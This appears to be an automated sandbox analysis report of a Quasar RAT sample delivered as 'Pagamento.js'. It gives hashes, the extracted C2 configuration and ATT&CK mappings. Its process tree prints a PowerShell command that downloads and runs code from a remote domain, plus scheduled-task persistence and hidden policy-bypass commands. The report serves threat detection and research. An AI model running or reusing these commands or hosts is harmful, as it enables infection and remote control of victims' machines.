quasar | 3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e

General

Target

Pagamento.js
Size

169KB
MD5

c0871f07733a3727e82c64aacda9a85b
SHA1

bf364b5b56ee65351a0bc5bca249ddeed5705e76
SHA256

3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
SHA512

56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
SSDEEP

3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M

Score

10^/10

quasar op23 spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/b.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/v1.txt

Extracted

Family

quasar

Version

2.7.0.0

Botnet

OP23

C2

vhf.sytes.net:4783

15.235.109.170:4782

Mutex

2vrOj8wCud9msk5z8w

Attributes

encryption_key
ywxbR3BS4B6Rtb7nv9vB
install_name
Venom.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Venom Client Startup

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

8 4104 powershell.exe
57 3656 powershell.exe

flow	pid	process
8	4104	powershell.exe
57	3656	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

59 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3656 set thread context of 5012 3656 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1772 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4104 powershell.exe
4104 powershell.exe
3656 powershell.exe
3656 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegSvcs.exe

description pid process

Token: SeDebugPrivilege 4104 powershell.exe
Token: SeDebugPrivilege 3656 powershell.exe
Token: SeDebugPrivilege 5012 RegSvcs.exe

flow	ioc
59	ip-api.com

description	pid	process	target process
PID 3656 set thread context of 5012	3656	powershell.exe	RegSvcs.exe

pid	process
1772	schtasks.exe

pid	process
4104	powershell.exe
4104	powershell.exe
3656	powershell.exe
3656	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	5012	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

wscript.exepowershell.exeWScript.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4972 wrote to memory of 4104	4972	wscript.exe	powershell.exe
PID 4972 wrote to memory of 4104	4972	wscript.exe	powershell.exe
PID 4104 wrote to memory of 1772	4104	powershell.exe	schtasks.exe
PID 4104 wrote to memory of 1772	4104	powershell.exe	schtasks.exe
PID 1404 wrote to memory of 788	1404	WScript.exe	cmd.exe
PID 1404 wrote to memory of 788	1404	WScript.exe	cmd.exe
PID 788 wrote to memory of 4644	788	cmd.exe	cmd.exe
PID 788 wrote to memory of 4644	788	cmd.exe	cmd.exe
PID 4644 wrote to memory of 3656	4644	cmd.exe	powershell.exe
PID 4644 wrote to memory of 3656	4644	cmd.exe	powershell.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe
PID 3656 wrote to memory of 5012	3656	powershell.exe	RegSvcs.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn PDF /tr C:\ProgramData\PDF\PDF.vbs
3⤵
- Creates scheduled task(s)
PID:1772

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\PDF\PDF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:788

C:\Windows\system32\cmd.exe
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
3⤵
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF.ps1"
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PDF\1.bat
Filesize
89B

MD5
a7f20549327da521bf176b6faa76e623

SHA1
b9b22202b9d3d43ffa6cbf2f3f81dc7f5b06c605

SHA256
a2099940d9f7f9a0a603a5a36ef2b24eef49f2cb428539949a6d75261faaba46

SHA512
5cac6f996aa1bb4dd11a39d3001da243c6f020bc1a3d86a36ec773d45e479514b006e3b3d8782b1eaab628d0fefdb987495308b9c88f38667f875179771f4823

Download Submit
C:\ProgramData\PDF\PDF.ps1
Filesize
123KB

MD5
c88e3dee4837866917307a16170ffc48

SHA1
52600186a12ba1301d388a3d07a3ac1086c12375

SHA256
4662f9bc745e25e9af52df90590449772f8cc5a13c4c4ba13fbe42e7ecc82b73

SHA512
0b4edca40b32d9e4105fe79bdeace659253b626d15d6b218c8ea8f0288cacb2feb0644f1ef84a02bc9e402340910a2c2b0d0ee13c5697b1cdddf0c4d0159bea3

Download Submit
C:\ProgramData\PDF\PDF.vbs
Filesize
120B

MD5
30e4773314799aa0e1fd7761cae6e609

SHA1
d1b5a371a7555e99a7602ae6ee8028ac0f0462c4

SHA256
dc592583d072f325b7a0a54d53499f32ef95c731344cc10400f0bb03e7db4720

SHA512
fcbeca634cb6fe2d0ea4f726f09b4a35917615467a562e9d73cd235cd337bb797fb6a996f0569e83f4f858c0226b84fbd2d0721bea47d1039e5ffe6ebca0bb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ac902dcb52cf1e5b64743d0ed0635dbd

SHA1
f88a91c878f35374a7f7264de1594f3e1a4492b8

SHA256
3b31733ba1fbf536fd9c7c1641dc7b6f956b299838524955d9209f2d33fe5b24

SHA512
13fa35c6ff7857ab8051ab4e618e119de197d85b0bf8fa53eae70fe4e12003ff554c63d1618ffee1b19da8183172a37f0f686a9664012e3c1241f0b648bef13e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svrs4kc5.xhq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3656-171-0x00000215B7370000-0x00000215B7380000-memory.dmp

Filesize
64KB

Download
memory/3656-170-0x00000215B7370000-0x00000215B7380000-memory.dmp

Filesize
64KB

Download
memory/4104-151-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/4104-152-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/4104-133-0x00000208EC580000-0x00000208EC5A2000-memory.dmp

Filesize
136KB

Download
memory/4104-150-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/4104-145-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/4104-144-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/4104-143-0x00000208EC600000-0x00000208EC610000-memory.dmp

Filesize
64KB

Download
memory/5012-172-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/5012-174-0x0000000005540000-0x0000000005AE4000-memory.dmp

Filesize
5.6MB

Download
memory/5012-175-0x00000000050B0000-0x0000000005142000-memory.dmp

Filesize
584KB

Download
memory/5012-176-0x00000000051A0000-0x00000000051B0000-memory.dmp

Filesize
64KB

Download
memory/5012-177-0x00000000052B0000-0x0000000005316000-memory.dmp

Filesize
408KB

Download
memory/5012-178-0x0000000005EB0000-0x0000000005EC2000-memory.dmp

Filesize
72KB

Download
memory/5012-179-0x00000000062E0000-0x000000000631C000-memory.dmp

Filesize
240KB

Download
memory/5012-180-0x0000000006A30000-0x0000000006A3A000-memory.dmp

Filesize
40KB

Download
memory/5012-181-0x00000000051A0000-0x00000000051B0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads